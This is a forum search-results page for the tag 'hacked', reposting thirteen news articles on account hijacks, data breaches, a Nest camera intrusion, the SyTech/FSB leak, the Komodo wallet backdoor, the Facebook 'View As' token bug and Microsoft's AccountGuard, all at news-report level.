Jump to content

Search the Community

Showing results for tags 'hacked'.

More search options

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


  • Site Related
    • News & Updates
    • Site / Forum Feedback
    • Member Introduction
  • News
    • General News
    • FileSharing News
    • Mobile News
    • Software News
    • Security & Privacy News
    • Technology News
  • Downloads
    • nsane.down
  • General Discussions & Support
    • Filesharing Chat
    • Security & Privacy Center
    • Software Chat
    • Mobile Mania
    • Technology Talk
    • Entertainment Exchange
    • Guides & Tutorials
  • Off-Topic Chat
    • The Chat Bar
    • Jokes & Funny Stuff
    • Polling Station

Find results in...

Find results that contain...

Date Created

  • Start


Last Updated

  • Start


Filter by number of...

Found 30 results

  1. Facebook's Twitter and Instagram accounts hacked, 'OurMine' claims responsibility Facebook’s Twitter and Instagram handles were compromised earlier today, as tweets and posts began showing up that said: “Well, even Facebook is hackable but at least their security better than Twitter”. A group called OurMine claimed responsibility for the hack, which reportedly was also responsible for the NFL’s Twitter account hack last month. The hackers began posting tweets from Facebook and Messenger accounts, which were constantly being deleted by the company (as seen in Jane Manchun Wong’s tweet here). The accounts were compromised for about 30 minutes, after which they were locked. Twitter confirmed in a statement to some journalists that the accounts were indeed compromised and that it was working with Facebook to restore the accounts: As soon as we were made aware of the issue, we locked the compromised accounts and are working closely with our partners at Facebook to restore them. Facebook later posted in a tweet that it had “secured and restored” access. Interestingly, the hackers seem to have had taken control of Facebook and Messenger Instagram handles (spotted by The Verge). Though the hackers claimed that “Facebook” was hackable, it wasn’t Facebook that was hacked, but its social media accounts alone, such as Twitter and Instagram. The tweets by 'OurMine' were posted from 'Khoros', a third-party service that helps its customers interact with and post on social media – including Instagram and Twitter. From the tweets, it looks like the hackers were promoting their security services and did not seem to have any malicious intent. Source: Facebook's Twitter and Instagram accounts hacked, 'OurMine' claims responsibility (Neowin)
  2. Breach Of Popular Audio Streaming Site Exposes 20 Million Accounts The popular audio streaming site Mixcloud has reportedly been hacked. Account information belonging to as many of 22 million of its users is for sale on the Dark Web. Zach Whittaker of TechCrunch reports that the breach occurred earlier this month. The individual claiming responsibility for the breach provided Whittaker with a sample of the data — something hackers will often do to prove the validity of the ill-gotten data. In fact, the very same hacker contacted Whittaker in August to share details about a different breach. That incident involved StockX, a billion-dollar online marketplace that allows users to buy and sell shoes and clothing. Whittaker reports that the hacker is asking .5 bitcoin (just under $3,900 at current rates) for the hacked Mixcloud data. While no payment card data was exposed this time around, the Mixcloud data does include email addresses, usernames, links to their profile photos, IP addresses and encrypted passwords. Mixcloud users do have something to be thankful for on that front: strong encryption. the company reportedly hashed its users’ passwords with SHA-2, a very strong cryptographic standard. As a result, well-chosen passwords will be nearly impossible to crack. In a database with more than 20 million records, however, there’s a very high likelihood that many of the passwords are anything but difficult to guess. No matter how many times the worst passwords of the year get reported, people keep on using them. When a database like this one starts making the rounds, those weak passwords come back to haunt the users who chose them. Mixcloud has yet to offer any official statement regarding the breach. An investigation will likely be forthcoming, however, as the London-based firm could be subjected to a fine of as much as £20 million 4% of its annual turnover under GDPR guidelines. In one of the highest-profile GDPR incidents to date, hotel giant Marriott was hit with a whopping £99 million for a similar — albeit much larger — breach in 2018. Source
  3. A glitch with Keretapi Tanah Melayu Bhd (KTMB)’s online ticketing system caused severe disruptions during the first day of advanced ticket sales on Monday, and measures are already being put in place to avoid a repeat situation. According to The Malaysian Reserve, Chief Executive Officer Datuk Kamarulzaman Zainal said that the main cause of the disruption was the sheer volume of users attempting to buy tickets. This was exacerbated by around 400,000 visitors on the site, with 30,000 transactions being completed on Monday. To better handle the load in the future, the CEO said that KTMB’s internet bandwidth capacity is being doubled from 100Mbps, while they will also be making improvements to the centralised processing unit of the system. But the Kamarulzaman isn’t ruling out the possibility of a more nefarious motive at work here. According to an NST report: Given the lack of any more information regarding this, perhaps the CEO was merely listing out all potential causes of the overload. Regardless, more conclusive news will (hopefully) arrive at the end of the investigation. It also appears that server overload caused by online purchasers caused severe delays for over-the-counter ticket customers as well, with up to 2-hour waits reported. Currently, KTMB is selling 1.2 million tickets for the Electric Train Service (ETS) and inter-city trains, with dates ranging from December 1 to February 29 2020. Despite the issues, 77,000 tickets were still sold on the first day of sales. Source: KTMB to investigate hacking as possible cause of online ticketing glitch (via SoyaCincau)
  4. In this day and age, online account security is constantly under attack by nefarious parties that are looking to settle scores, makes a few bucks, or simply trying to make a name for themselves. 2K Games found this out the hard way last night after a number of its social media accounts were hacked in a massive security breach for the game publisher. Not only was the company's Facebook account compromised, but its Twitter profile was also taken over by foul-mouthed pranksters. One social media account being compromised is bad enough, but this was a coordinated attack across multiple mediums, which is much more troubling security problem for 2K Games. Messages posted to Facebook and Twitter consisted primarily of inflammatory and racist messages across numerous 2K Games properties, including the publisher’s primary Facebook page, and pages for Borderlands and WWE 2K. There were even posts referring to the size of one's... well, "member". Needless to say, it's a rather childish prank, and one that is at face value embarrassing for 2K Games. The perpetrators gave a shout out to the Chuckling Squad, which previously claimed responsibility for hacking Jack Dorsey's Twitter account. We have no idea if Chuckling Squad is truly responsible for these hacks, or if it's just another party looking to have some fun at the group's expensive. As of this writing, 2K Games appears to have gotten its social media accounts back under its own control. At the very least, we hope that the company's social media account managers have switched to more secure passwords and enabled two-factor authentication. Source: 2K Games' Twitter And Facebook Accounts Were Hacked And It’s Ugly (via Hot Hardware)
  5. A father Googled “Nest + camera + hacked” and found out that this happens frequently It was an unremarkable Wednesday afternoon when our nanny texted my wife and me asking if we were speaking through one of the Nest cameras in our house. We both replied that we were not. Then the nanny texted that a voice was coming through the kitchen camera and using bad words. I immediately pulled up the video feed and began reviewing: I hear the familiar chime, which means someone is about to talk through the camera. Then, to my horror, a female voice that I don’t recognize starts talking to my 18-month-old son. He looks around the room and then at the ceiling, wondering who’s there. It feels as though my heart is about to beat through my chest. The blood rushes to my face. I am completely helpless. The voice is laughing when it chimes in. She says we have a nice house and encourages the nanny to respond. She does not. The voice even jokes that she hopes we don’t change our password. I am sick to my stomach. After about five minutes of verbal “joy riding,” the voice starts to get agitated at the nanny’s lack of response and then snaps, in a very threatening voice: “I’m coming for the baby if you don’t answer me, bi**ch!” My jaw drops. We unplug the cameras and change all passwords. The nanny has taken our son to the park down the street in an effort to escape. However, the damage has been done. Still helpless, I started doing the only thing I could do — Googling. I typed “Nest + camera + hacked” and found out that this happens frequently. Parent after parent relayed stories similar to mine — threatening to steal a baby is shockingly common — and some much worse, such as playing pornography over the microphone to a 3-year-old. I dove deeper to find out how this could have happened. Essentially, an email and a password are compromised somewhere across the internet. They join millions of other email addresses and passwords, which are then cross-referenced with other websites, including Nest. When a match is found, any novice can jump on and terrorize with little to no technical background. What is worse is that anyone could have been watching us at any time for as long as we have had the cameras up. This person just happened to use the microphone. Countless voyeurs could have been silently watching (or worse) for months. However, what makes this issue even more terrifying is a corporate giant’s complete and utter lack of response. Nest is owned by Google, and, based on my experience and their public response, Google does not seem to care about this issue. They acknowledge it as a problem, shrug their shoulders and point their fingers at the users. Their party line is to remind people that the hardware was not hacked; it was the user’s fault for using a compromised password and not implementing two-step authentication, in which users receive a special code via text to sign on. That night, on my way home from work, I called Nest support and was on hold for an hour and eight minutes. I followed all directions and have subsequently received form emails in broken English. Nobody from Google has acknowledged the incident or responded with any semblance of empathy. In every email, they remind me of two-step authentication. They act as if I am going to continue to use Nest cameras. I am reminded of Google’s former motto: “Don’t be evil” (now buried in literally the last sentence of their code of conduct). It is not evil to bring a product to market before the privacy has been completely figured out, but it is evil to let someone threaten to kidnap an 18-month-old and have no real response. Maybe privacy is a thing of the past. Maybe trolls on the internet are everywhere. Or maybe an almost trillion-dollar company needs to hire a few more developers focused on security and a few more customer service representatives to help parents cope when anonymous, sadistic people terrorize their users. Or maybe Google buried its former motto for a reason. Source
  6. London's Metropolitan Police has apologised after its Twitter, emails and news pages were targeted by hackers and began pumping out a series of bizarre messages. After a series of messages late last night that read simply "test" or seemingly random letters, the police sites began using foul language with anti-police sentiment and calling for a jailed rapper to be released. "Free Digga D," said one such message. The Met Police's Twitter account has 1.22 million followers. Scotland Yard police headquarters said its internal IT infrastructure had not been hacked, explaining the issue was limited to its press office's online provider, MyNewsDesk, which put news releases online to the public. "Unauthorised messages appeared on the news section of our website," it said, as well as on its Twitter feed and emails. "We apologise to our subscribers and followers for the messages they have received. "We are confident the only security issue relates to access to our MyNewsDesk account. We have begun making changes to our access arrangements to MyNewsDesk," it said. "There has been no 'hack' of the Met Police's own IT infrastructure. We are assessing to establish what criminal offences have been committed." US President Donald Trump weighed in, reigniting his long-running war of words with London Mayor Sadiq Khan while retweeting an image of the hijacked Metropolitan Police account. "With the incompetent Mayor of London, you will never have safe streets!" he tweeted. Drill music artist Digga D, real name Rhys Herbert, was jailed last year aged 17 along with four other members of his gang, after they were caught with baseball bats and machetes on their way to attack rivals. The drill genre of rap music, which often features masked or hooded groups of men talking about guns, drugs and stabbings, has been linked to a rise in violent crime in the capital. Besides his jail term, Herbert was given a three-year criminal behaviour order restricting him from making music with violent lyrics. Source
  7. Hackers breach FSB contractor, expose Tor deanonymization project and more SyTech, the hacked company, was working on research projects for the FSB, Russia's intelligence service. Image: 0v1ru$ Hackers have breached SyTech, a contractor for FSB, Russia's national intelligence service, from where they stole information about internal projects the company was working on behalf of the agency -- including one for deanonymizing Tor traffic. The breach took place last weekend, on July 13, when a group of hackers going by the name of 0v1ru$ hacked into SyTech's Active Directory server from where they gained access to the company's entire IT network, including a JIRA instance. Hackers stole 7.5TB of data from the contractor's network, and they defaced the company's website with a "yoba face," an emoji popular with Russian users that stands for "trolling." Hackers posted screenshots of the company's servers on Twitter and later shared the stolen data with Digital Revolution, another hacking group who last year breached Quantum, another FSB contractor. This second hacker group shared the stolen files in greater detail on their Twitter account, on Thursday, July 18, and with Russian journalists afterward. FSB's secret projects Per the different reports in Russian media, the files indicate that SyTech had worked since 2009 on a multitude of projects since 2009 for FSB unit 71330 and for fellow contractor Quantum. Projects include: Nautilus - a project for collecting data about social media users (such as Facebook, MySpace, and LinkedIn). Nautilus-S - a project for deanonymizing Tor traffic with the help of rogue Tor servers. Reward - a project to covertly penetrate P2P networks, like the one used for torrents. Mentor - a project to monitor and search email communications on the servers of Russian companies. Hope - a project to investigate the topology of the Russian internet and how it connects to other countries' network. Tax-3 - a project for the creation of a closed intranet to store the information of highly-sensitive state figures, judges, and local administration officials, separate from the rest of the state's IT networks. BBC Russia, who received the full trove of documents, claims there were other older projects for researching other network protocols such as Jabber (instant messaging), ED2K (eDonkey), and OpenFT (enterprise file transfer). Other files posted on the Digital Revolution Twitter account claimed that the FSB was also tracking students and pensioners. Some projects came to be, were tested But while most of the projects look to be just research into modern technology -- which all intelligence services carry out -- there are two that appear to have been tested in the real world. The first was Nautilus-S, the one for deanonymizing Tor traffic. BBC Russia pointed out that work on Nautilus-S started in 2012. Two years later, in 2014, academics from Karlstad University in Sweden, published a paper detailing the use of hostile Tor exit nodes that were attempting to decrypt Tor traffic. Researchers identified 25 malicious servers, 18 of which were located in Russia, and running Tor version, the same one detailed in the leaked files. The second project is Hope, the one which analyzed the structure and make-up of the Russian segment of the internet. Earlier this year, Russia ran tests during which it disconnected its national segment from the rest of the internet. SyTech, the hacked company, has taken down its website since the hack and refused media inquiries. Source: Hackers breach FSB contractor, expose Tor deanonymization project and more
  8. Few people had ever heard of Perceptics, a Tennessee-based subcontractor that sells license plate readers to U.S. Customs and Border Protection, before last month, when news emerged that the company had been hacked and that sensitive data — including images of license plates and drivers — had been released on the dark web. The hack is just the sort of privacy breach that civil liberties advocates have long warned could come from massive government data collection, especially when it is contracted out to private firms. And it comes at a time when the CBP is under scrutiny for monitoring activists and journalists at the U.S.-Mexico border and airports. Yet while photos of faces and license plates of some 100,000 U.S. drivers are now freely available online, the CEO of Perceptics, John Dalton, claimed in an email a few years ago that “CBP has none of the privacy concerns at the border that all agencies have inland.” Writing to one of his company’s lobbyists in 2013, Dalton suggested that the border agency offered Perceptics an opportunity to make greater use of license plate images, stating, “Data mining and looking at traffic patterns/abnormalities are strong analytics for CBP, and could be for others.” Dalton appeared to be referring to the CBP’s relatively unfettered powers of search and seizure within 100 miles of the border. In contrast, for agencies other than CBP, “there is much concern with ACLU state level lawsuits and elsewhere around privacy issues, so this is a live challenge,” he wrote. Dalton’s email and other internal documents laying out Perceptics’ strategy to politically defend its products are among the data taken from the company by an anonymous hacker and analyzed by The Intercept. “Obviously, we don’t agree with the blanket assertion that there are no privacy concerns at the border,” said Nate Freed Wessler, of the American Civil Liberties Union’s Speech, Privacy, and Technology Project. “The government position is that they have latitude to do whatever they want there, and we vigorously disagree with that.” Wherever they are used, said Wessler, license plate readers, or LPRs, are concerning when the data they collect is retained and analyzed, providing a gold mine of location information as people go about their daily lives in their cars. “Especially for people who live in border communities, who live binational lives, it can really be sensitive information,” he said. And as the Perceptics hack shows, data that is retained is also vulnerable to unintended release or use, whether by hackers or unscrupulous government employees or contractors. Dalton’s emails distinguish between analyzing data and merely capturing it but suggest that Perceptics could be in the business of both. In response to the suggestion by an industry colleague that they “need to really hit back hard on separating technology with policy (data collection vs. data use)” in order to ward off privacy concerns, Dalton wrote, “Perceptics can do anything any of these extremes want and everything in between. That is just the kind of customer friendly company we are.” He continued, “For CBP, we do not host any data at all, as we are a complex sensor; for the Pentagon, the vehicle data is hosted/stored on our provided hardware/software solution, database and user interface. In any system, the data can be dumped just about under any set of timing or other conditions.” In early July, CBP suspended Perceptics from receiving any further contracts with the federal government, citing “evidence of conduct indicating a lack of business honesty or integrity.” The suspension apparently came because the company “had transferred copies of license-plate and traveler images onto its private network in violation of agency rules,” according to the Washington Post. A CBP official told the paper that Perceptics was trying to “refine its algorithms to match license plates with the faces of a car’s occupants, which the official said was outside of CBP’s sanctioned use.” Neither CBP nor Perceptics responded to questions from The Intercept. Reached for comment, Cristina Antelo, a lobbyist who has worked with Perceptics for over a decade as part of the Podesta Group and at her own shop, said that the company’s position on privacy has always been about the distinction between the technology, which Perceptics provides, and its use, which is determined by the customer. When she spoke with members of Congress, she said, “The question was always what happens to that data: Who has access to it, where is it stored? Does ICE get access to it? How long would you keep it? Our response at that time is that those are all valid policy concerns, and that is a policy issue for Congress to determine.” Preempting Privacy Concerns Perceptics nonetheless showed a strong interest in shaping Congress’s determinations around license plate policy. The company engaged in years of lobbying to preempt criticism of its products from privacy advocates, insisting that what happened to the data that its license plate readers captured was none of its business — even as the company worked on controversial trials pairing its camera systems with other companies’ facial recognition products. Perceptics staff and lobbyists tracked the reaction to stories about ICE gaining access to license plate databases and the DEA building them out, the emails show. In monthly reports spanning several years, the Podesta Group detailed its work on appropriations bills and other spending vehicles. In 2014, for instance, Podesta Group representatives mentioned monitoring legislation regulating location data collection, saying that their staff would “preemptively meet if necessary to ensure LPRs do not get drawn further into the privacy conversation.” In 2015, Podesta Group representatives spoke about building a “possible coalition against LPR bans,” according to one of the reports. After Donald Trump took office, Antelo and other Podesta staff provided updates on government negotiations over border spending, which sometimes raised the concern that Trump’s hard-line immigration demands would end up scuttling spending on technology and hurt her clients’ bottom line. “A Trump presidency doesn’t guarantee a bonanza for Perceptics,” Antelo wrote in a January 2017 email to a Perceptics executive, noting the administration’s pledge to cut budgets. “We might want to do some pre-emptive defense of Perceptics’ programs early on, in addition to affirmatively pushing for more funding,” she continued. In an October 2017 update, Podesta staffer Lucia Alonzo wrote that the administration was holding “to the idea of a southern border wall — there is little mention of other types of technology and infrastructure.” Their job, she said, “continues to be ensuring our LPR language is in any future compromise package.” In a February 2018 email, Antelo described meetings with staffers for Democrats Peter Aguilar, a California congressman, and Michael Bennet, a Colorado senator and presidential candidate: “Both staffer brought up privacy and data mgmt concerns generally and seemed content with the response that we have no input as to how the data is managed and that it is a valid policy discussion for CBP.” Antelo wrote that when Bennet’s staff asked “about privacy and security of LPR data Perceptics camera captures, we gave them the standard response.” Staffers for Democratic Sen. Bob Menendez, of New Jersey, on the other hand, “assured us their office has no objection to LPRs. In the larger discussion of DACA/border security, they said they don’t really have a problem with border tech, but rather dramatic stuff like the wall.” “Michael’s staff raised flags about the privacy risks associated with license plate reader technology and the recent data breach appears to bear out their concerns,” according to Courtney Gidner, a spokesperson for Bennet. “This event has underscored the risks of collecting such information in the first place and how it is stored and protected.” (The offices of Aguilar and Menendez did not respond to requests for comment.) About-Face Antelo insisted that Perceptics “makes cameras, really good cameras, and we sell cameras. We do not do facial recognition, we never have and are not developing it.” But recent emails make clear that Perceptics was at the very least involved in trials to work with other companies that do do facial recognition. The company worked on a pilot for CBP’s “Vehicle Face System,” which, as reported by The Verge last year, was aimed at scanning drivers’ faces through the windshields of their cars, in order to match drivers with the photos on file in government databases. Emails and other Perceptics documents reference work with Unisys, another contractor, on the project. One email discussing Perceptics’ success in identifying people in cars for policing HOV lanes references “a CBP project” that was “touting high match rates using facial recognition.” In June 2018, an email chain about naming “new products for our borders market” referenced efforts they called “Face Find” and “Face at Speed.” The suggested names from one employee? “1. Big Brother 2. Voyeur 3. Mug shot 4. Head shot 5. paparazzo.” In Brownsville, Texas, in December 2018, a Perceptics employee was instructed to “hold off on the face cam for the moment. We didn’t have permission to install that in Brownsville, and with privacy concerns we need to do some thinking before we install any face capture utilities within the CBP facilities.” “We’ve never had full insight into what CBP is collecting and what they are storing, and what piece of the puzzle each subcontractor has,” said Neema Singh Guliani, a senior legislative counsel with the ACLU. But, she said, although CBP has rolled out face recognition technology in airports and at pedestrian crossings, for her, there are “big questions about whether CBP has explicit authority to use face recognition.” “Technology that is used at the border doesn’t stay at the border,” said Mana Azarmi, policy counsel with the Center for Democracy and Technology. “Automatic license plate readers are fairly ubiquitous, and if they manage to attach the software to these cameras and get readable images, then it spreads, we have the ability for law enforcement to do real-time facial recognition of drivers which is something we’ve always warned of.” Perceptics was alert to the controversy and impending policy changes around face recognition. In August 2018, Alonzo flagged Sen. Kamala Harris, another Democratic presidential contender, for her “interest in privacy and data security surrounding these technologies.” She said that she would track the progress of the legislation Harris had introduced “for any potential impact on Perceptics’ work with facial recognition firms,” and added “we’ll also track reactions to see who else might extend their privacy/data security concerns to technologies like LPRs, and conduct preemptive outreach.” Source
  9. This is the same exchange that reportedly sold Mt Gox’s bitcoin last year on behalf of its trustee. Japanese crypto exchange Bitpoint has become the latest exchange to suffer a major loss of funds. Its loss of $32 million—in five cryptocurrencies—was announced today. The majority of the coins stolen were from customer funds, with just over a quarter belonging to the exchange itself. The funds stolen were in bitcoin, ethereum, XRP, litecoin and bitcoin cash. Bitpoint has not yet said whether customer’s funds will be recouped. Hacked exchanges typically choose to pay back stolen funds, rather than declare bankruptcy, given that they can cover the costs. This is not the first serious hack Japan has seen. The nation was an early adopter, and so suffered some of the earliest hacks, notably Mt. Gox—which lost $350 million back in 2014. In a strange twist, Bitpoint may also be the same exchange that sold $318 million of Mt. Gox’s coins last year. These were sold by trustees on behalf of the exchange with the original intent of paying back creditors in the fiat equivalent of the bitcoin they lost. Many believed this helped to sink the prices of cryptocurrencies across the board, and was a harbinger for the long crypto winter. According to bank documents revealed on a website called GoxDox, the trustee who sold the coins received millions in dollars from Bitpoint, implying that it was the exchange of choice for the sale of coins. Source
  10. Croatian government targeted by mysterious hackers Government agencies targeted with never before seen malware payload — named SilentTrinity. A mysterious hacker group has targeted, and most likely infected, Croatian government employees between February and April this year. Attackers, which are suspected to be a state-sponsored unit, have targeted victims using a spear-phishing campaign that mimicked delivery notifications from the Croatian postal or other retail services. Emails contained a link to a remote website with a lookalike URL, where users were asked to download an Excel document. Users targeted with never-before-seen malware The document was laced with malicious code packed as a macro script which appeared to have been largely copied off the internet, from various tutorials or open source projects hosted on StackOverflow.com, Dummies.com, Issuu.com, Rastamouse.me, or GitHub.com. The macro script, if enabled by the victim, would download and install malware on their systems. Two different sets of malware payloads were detected during these attacks. The first was the Empire backdoor, a component of the Empire post-exploitation framework, a penetration testing utility. The second was SilentTrinity, another post-exploitation tool, similar to the first. In a presentation at the Positive Hack Days (PHDays) security conference in May, Alexey Vishnyakov, a Senior Specialist in Threat Analysis for cyber-security firm Positive Technologies, said this was the first time when a malicious threat actor had weaponized the SilentTrinity tool in an active malware distribution campaign. Croatian government detected the attacks in April While they went under the radar for two months, the phishing attacks were eventually detected in early April. The Information Systems Security Bureau (ZSIS), the central state authority responsible for the cyber-security of the Republic of Croatia state bodies, issued two separate alerts about the attacks [1, 2]. The state cyber-security agency shared indicators of compromise, such as file names, registry keys, URLs, and IP addresses for the attackers' command and control (C&C) servers, asking state agencies to check logs and scan computers for potential infections. "The Croatian Post has already taken steps to remove the malicious web sites and servers, but both malware versions are currently active," the agency said. "With this malware attackers can take control over a computer and execute arbitrary commands under the authority of the user who opened the XLS file and enabled to execute the macro commands." In a report published today, Vishnyakov pointed out certain connections between the C&C servers used in this campaign targeting Croatian government agencies and past malware distribution operations. The most important is a FireEye report about hackers using a WinRAR vulnerability to infect government targets in Ukraine with the same Empire backdoor, and using the same C&C server. While FireEye never attributed those attacks to a specific hacker group, the targeting of the Ukrainian government is specific to Russian threat actors, who have been targeting the country's officials and government agencies since 2014, when Russian troops invaded the Crimean peninsula. While Vishnyakov refrained from attributing these attacks to a specific threat actor, the researcher did note that "the available data on hosts, addresses, and domains used-as well as the high number of connections between them-suggests a large-scale malicious effort." Source: Croatian government targeted by mysterious hackers
  11. Are you using Komodo's Agama Wallet to store your KMD and BTC cryptocurrencies? Were your funds also unauthorisedly transferred overnight to a new address? If yes, don't worry, it's probably safe, and if you are lucky, you will get your funds back. Here's what exactly happened… Komodo, a cryptocurrency project and developer of Agama wallet, adopted a surprisingly unique way to protect its customers' funds. The company hacked its customers and unauthorisedly transferred nearly 8 million KMD and 96 Bitcoins from their cryptocurrency wallets to a new address owned by the company. Why? To secure funds of its customers from hackers. This may sound weird, but it's true. Komodo recently learned about a malicious open source, third-party JavaScript library that the company was using in its Agama Wallet app. The library, named "electron-native-notify," two months ago received a update from its anonymous author who included a secret backdoor in the new code that was designed to steal and send seeds/private key and other login passphrases of Agama wallet users to a remote server. So, if you have logged in to any version of Agama wallet downloaded from Komodo's official website or their Android and iOS apps after 13 April this year, it's likely you've had your wallet credentials stolen. The malicious library update in question was initially detected by a security team at npm JavaScript package repository service, who then informed Komodo of the issue. The npm blog also shared a brief video demonstration showing how the backdoored version of Agama wallet has been secretly sending a wallet's private seed to a remote server in the background. After discovering the vulnerability, Komodo decided to use similar password stealing technique against its users to gain access to as many affected wallets as possible and transferred their funds to a safe wallet before hackers could have stolen them. However, it's important to note that not all affected user wallets have been emptied by the company. So, if your wallet has not been swept, you are strongly recommended to immediately move all your funds from Agama to a new address. Komodo also said that the Verus version of its Agama wallet is not affected by this vulnerability and is still completely secure, as it doesn't include the malicious library in question. So, users of Verus version of Agama wallet are not affected by the security incident. Source
  12. Facebook revealed more details about how hackers exploited three distinct bugs to get the ability to control up to 50 million users’ accounts. On Friday, Facebook revealed that hackers broke into the company’s servers and potentially stole the data of up to 50 million people. The social network forced 90 million people—around 50 million victims plus an additional 40 million that may have been affected, according to the company—to log out and log back in again. That’s because the hackers stole their “access tokens,” a sort of digital key that Facebook creates when you log in and allows you to stay logged in when the Facebook mobile app wants to open another part of Facebook inside a browser, for example (this might occur when you click a link.) An access token doesn’t include a user’s password, but since it allows a user to stay logged in having an access token means you can completely control the account. “Parts of our site use a mechanism called single sign-on that creates a new access token,” Guy Rosen, Facebook’s vice president of product management, told reporters on a press call. “The way this works is: let’s say I’m logged into the Facebook mobile app and it wants to open another part of Facebook inside a browser, what it will do is use that single sign-on functionality to generate an access token for that browser, so that means you don’t have to login again on that window.” The hackers took advantage of three distinct vulnerabilities chained together in order to steal the tokens, Rosen said. The vulnerabilities have existed since at least July 2017 and were related to Facebook’s “View As” tool, which allows you to view your own profile as if you were someone else (this is a privacy feature—it allows, for example, you to check whether your ex, or grandma, or anyone who you want to hide things from can see certain posts on your page.) If you haven’t used the feature before, it can be hard to visualize or imagine. Basically, let’s say you wanted to hide some wall posts from your nemesis John. You can change your Facebook privacy settings to allow John to only see certain posts. Then, to check that the changes to your privacy settings actually worked, you can use the View As feature to look at your profile as if you were John. You’re not actually John, of course, and you don’t have access to his account—it’s just a simulation. But these chains of bugs would have allowed you, if you were a hacker, to acquire John’s access token, and then log into his account using that token, therefore taking full control of his account. “It’s important to say: the attackers could use the account as if they were the account holder,” Rosen said. The first bug, Rosen explained, caused a video uploader to show up on View As pages “on certain kinds of posts encouraging people to post happy birthday greetings.” Normally, the video uploader should not have showed up. The second bug caused this video uploader to generate an access token that had permission to log into the Facebook mobile app, which is not how this feature “is intended to be used,” according to Rosen. The final bug, Rosen explained, was that when the video uploader showed up as part of the View As feature, it generated a new access token not for the user, but for the person who they were pretending to be—essentially giving the person using the View As feature the keys to access the account of the person they were simulating. In the example we gave above, this would not only have allowed you to look at John’s profile using the View As John feature, but it also would have generated an access token allowing you to login to and take over John’s account. “It was the combination of those three bugs that became a vulnerability. Now, this was discovered by attackers,” Rosen said. “Those attackers, in order to run the attack, needed not just to find this vulnerability, but they needed to get an access token and then to pivot that access token to other accounts and then look up other users in order to get further access tokens.” Rosen said he believed that this was a relatively sophisticated attack, especially to get up to 50 million different logins: “This is a complex interaction of multiple bugs that happened together,” he said. “We did see this attack being used at a fairly large scale, which is how we discovered it and began investigating and found the attack that was happening,” Rosen said. “We don’t know exactly how accounts were misused so far.” Ryan Stortz, a security researcher at Trail of Bits, told Motherboard that Facebook should’ve had the ability to find this bug before the hackers did. “Facebook has a whole API filter that they stream all account changes (writes) through that should have caught this,” Stortz told Motherboard in an online chat. “I don’t know what the flaw was, but if they took over Zuck’s account, that’s bad and they should have had a write filter to prevent that.” But a former Facebook security engineer said this was not a trivial bug to find. “It sounds like a hell of a find, the ‘View As’ code has been around for a while so I'm not surprised it had some bugs,” Zac Morris, who worked in Facebook’s security division from 2012 until 2016, told Motherboard. “But pivoting off that into full access tokens is pretty impressive.” Morris added that “as someone who was affected I'm mostly interested in who was doing it and why, [because] that’s a $30,000 bug bounty report, so they must've had some better way to monetize it which is a little scary.” Rosen said that the hackers did not steal passwords, so unless you’ve already been forced to log out, you should not be affected and users don’t need to change their passwords. Facebook said it has temporarily disabled the View As feature. Source
  13. from the the-times-we-live-in dept We live in such ridiculous times. The ongoing silly narrative over supposed "political bias" by tech companies is causing all sorts of stupid follow on effects. For instance, Microsoft has now asked the Federal Election Commission for an advisory committee to state that offering its enhanced security features -- known as AccountGuard -- to any political campaign won't be deemed an unfair campaign contribution. At first blush, this seems crazy that they would even need to do so, but it's really a product of the era that we live in. As you may recall, part of the issue around the whole Stormy Daniels / Donald Trump fight is the question of whether or not Trump lawyer Michael Cohen paying her off to stay quiet was an illegal campaign contribution because it was money paid specifically with the intent to aid a particular candidate (in this case, Trump) in his election campaign. Indeed, John Edwards got caught up in something quite similar in the 2008 campaign in having someone pay off his mistress to keep her quiet. And some have argued that the case against Trump is significantly stronger than the one against Edwards (in which he was indicted, but after an acquittal on one charge and a hung jury on the rest, the DOJ decided to drop the case). But the key issue under election law is that they apply to payments (or in-kind contributions) "for the purpose of influencing an election." And, in Microsoft's case, it highlights in its letter that it is offering this security service to all candidates regardless of their party positions, and thus is not trying to influence elections one way or the other just to protect politicians from getting hacked. It seems fairly obvious that this shouldn't even be an issue, but seeing as I'm not an expert in campaign finance, I reached out to former FEC chair Ann Ravel to see if I was missing something. She agreed that it was unlikely that Microsoft doing this would be seen as a violation of the law: "I am fairly confident that the FEC will conclude that Microsoft's proposed free service to "election sensitive" customers is permissible and not a prohibited in-kind contribution. Microsoft has made a good case that the service will not only be non-partisan but is in the company's own business interests, as well as their social obligation." But another reason why Microsoft may have asked the FEC for an opinion is that lately we've been seeing more and more people claiming -- somewhat ridiculously -- that the silly debate over "political bias" on the platforms also involves illegal campaign contributions. I believe that this is intellectually dishonest partisan gamesmanship, simply trying (weakly) to take the claims about the Daniels' payment and play whataboutism on a grand scale. Indeed, at least one candidate has even filed an FEC complaint over being banned by Twitter: and that's Paul Nehlen, who self-describes as a "pro-white candidate" and whose bigoted views are extreme enough that even Steve Bannon and others in the Trump camp have washed their hands of Nehlen. Nehlen's FEC complaint was put together by lawyer Marc Randazza, who many of you are familiar with. Frankly, I believe this is not his best work. It relies heavily on the debunked article by Vice that incorrectly claimed that Twitter was "shadowbanning conservatives" based on their political views. The reality was that Twitter was not shadowbanning (it was merely having some users not show up in autocomplete) and it wasn't based on their political views. But the complaint doesn't acknowledge any of that, and insists that the article is evidence of Twitter trying to silence Nehlen's side of the "debate." I raised some fairly skeptical questions about the complaint with Randazza over email, who responded that he believes that "Twitter and other platforms are attempting to "meddle in" elections" and stated, "Once they figure out who they can ban and who they can't, just watch for it." No offense to Marc, but that sounds fairly paranoid and devoid of any actual evidence. The discussions I've seen from platforms is that they actually are bending over backwards to appear "balanced" in how they handle political candidates from all across the political spectrum, perhaps to a ridiculous degree, out of fear of backlash from the supporters of those politicians. In Nehlen's case, his tweets were so far over the top and so far beyond what Twitter's terms of service allowed, that they finally got rid of him. Again, due to my lack of experience with campaign finance laws, I ran the Nehlen complaint by former FEC Chair Ravel, who also felt that it stood little chance before the FEC, and suggested that the complaint misrepresented campaign finance law: And while the Nehlen complaint bends over backwards to argue that "Twitter is the new debate platform," it seems like a huge stretch to argue that just because everyone shows up on Twitter to debate, that this is the same as Twitter "staging" a debate. Ravel also see some other massive hurdles to Nehlen's complaint: In short, this seems unlikely to get very far. Though, given how long these things take, it may be years before we get official rulings on these issues. But, seeing as people are now trying to use campaign finance law as a weapon against anything related to politics, I guess we shouldn't be all that surprised to see Microsoft feel the need -- and you can almost hear the giant sigh coming from the legal team in Redmond -- to first seek an advisory ruling to make it clear that what they're doing in protecting candidates is okay. Source
